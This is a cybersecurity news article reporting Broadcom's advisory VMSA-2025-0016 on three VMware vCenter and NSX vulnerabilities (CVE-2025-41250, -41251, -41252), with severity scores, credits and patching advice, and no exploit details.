Red Hot Cyber, The cybersecurity news

Red Hot Cyber

Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
Search

Three serious vulnerabilities discovered in VMware vCenter and NSX: apply patches immediately.

Redazione RHC : 29 September 2025 21:49

On September 29, 2025, Broadcom released security advisory VMSA-2025-0016 , addressing three vulnerabilities identified in VMware vCenter and VMware NSX products. The bugs affect several solutions in the VMware ecosystem and have a severity rating of High , with a CVSSv3 score between 7.5 and 8.5 .

The vulnerabilities affect the following components and platforms:

  • VMware vCenter Server
  • VMware NSX and NSX-T
  • VMware Cloud Foundation
  • VMware Telco Cloud Platform
  • VMware Telco Cloud Infrastructure

Vulnerability Details

The identified vulnerabilities are classified as CVE-2025-41250, CVE-2025-41251 and CVE-2025-41252 .

CVE-2025-41250 – SMTP Header Injection in vCenter
A weakness in VMware vCenter allows SMTP header injection. A user with non-administrative privileges, but authorized to create scheduled tasks, could manipulate notification emails sent by the system. The vulnerability has a maximum CVSS score of 8.5 .

  • Resolution : Install the patches indicated in the Response Matrix.
  • Acknowledgements : Report by Per von Zweigbergk .

CVE-2025-41251 – Weak password recovery mechanism in NSX
VMware NSX has a flaw in its password recovery system. An unauthenticated attacker could exploit this to enumerate valid usernames, opening the way for brute-force attacks. The issue has been rated with a maximum score of 8.1 .

  • Resolution : Updates are available in the correct versions indicated by Broadcom.
  • Acknowledgements : This report was attributed to the National Security Agency (NSA) .

CVE-2025-41252 – Username Enumeration in NSX
An additional vulnerability in VMware NSX allows an unauthenticated user to enumerate valid accounts, increasing the risk of unauthorized access attempts. The vulnerability has been rated with a maximum criticality score of 7.5 .

  • Resolution : Official patches available in the Response Matrix.
  • Acknowledgements : This is also reported by the National Security Agency (NSA) .

Broadcom recommends applying the provided patches immediately for all affected distributions. There are no workarounds or temporary mitigations currently planned.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli